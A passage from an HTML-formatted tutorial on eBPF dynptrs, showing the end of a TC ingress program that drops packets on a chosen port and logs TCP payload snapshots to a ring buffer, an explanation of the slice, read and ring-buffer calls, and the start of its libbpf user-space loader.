        &lt;span class="n"&gt;bpf_ringbuf_submit_dynptr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_SHOT&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The program begins by declaring the kfuncs it needs. The &lt;code&gt;bpf_dynptr_from_skb()&lt;/code&gt; function creates a dynptr from the socket buffer, and &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; returns pointers to specific regions within it. The &lt;code&gt;__ksym&lt;/code&gt; attribute tells the loader these are kernel symbols to be resolved at load time.&lt;/p&gt;

&lt;p&gt;When parsing headers, notice how we provide local buffers (&lt;code&gt;eth_buf&lt;/code&gt;, &lt;code&gt;ip_buf&lt;/code&gt;, &lt;code&gt;tcp_buf&lt;/code&gt;) to each slice call. The slice function may return a pointer directly into packet data if it's linearly accessible, or it may copy data into our buffer and return a pointer to the buffer. Either way, we get a valid pointer we can dereference, or NULL on failure.&lt;/p&gt;

&lt;p&gt;The NULL check pattern is crucial. Each slice call can fail if the requested offset plus length exceeds packet bounds or if the data cannot be accessed for other reasons. The verifier treats the return value as possibly NULL and rejects any program that dereferences it without checking first.&lt;/p&gt;

&lt;p&gt;For ringbuf output, we use &lt;code&gt;bpf_dynptr_read()&lt;/code&gt; to copy TCP payload from the skb into a local buffer first. This demonstrates reading from an skb dynptr with runtime-determined length (bounded by configuration and available data). The read may fail if bounds are exceeded, in which case we set &lt;code&gt;snap_len&lt;/code&gt; to zero.&lt;/p&gt;

&lt;p&gt;The ringbuf dynptr reserve shows the variable-length allocation pattern. We compute the total size (header plus snapshot) and reserve that exact amount. After writing both the header and payload using &lt;code&gt;bpf_dynptr_write()&lt;/code&gt;, we submit the record. Note the discard call on reserve failure to satisfy the verifier's lifecycle requirements.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete User-Space Program: dynptr_tc.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;signal.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;arpa/inet.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;net/if.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"dynptr_tc.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"dynptr_tc.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;sig_atomic_t&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;signo&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event_hdr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;INET_ADDRSTRLEN&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;INET_ADDRSTRLEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="n"&gt;inet_ntop&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="n"&gt;inet_ntop&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"if=%u %s:%u -&amp;gt; %s:%u len=%u drop=%u snap=%u"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pkt_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;drop&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;" payload=&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
            &lt;span class="n"&gt;putchar&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="sc"&gt;'.'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ifname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_cfg&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse arguments */&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-i"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ifname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-p"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-s"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-n"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;ifname&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Usage: %s -i &amp;lt;ifname&amp;gt; [-p port] [-s len] [-n]&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;if_nametoindex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ifname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;perror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"if_nametoindex"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGINT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SIGTERM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_tc_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynptr_tc_bpf__open_and_load&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to load BPF&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Configure */&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_map__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cfg_map&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach to TC ingress */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_tc_hook&lt;/span&gt; &lt;span class="n"&gt;hook&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hook&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attach_point&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_TC_INGRESS&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
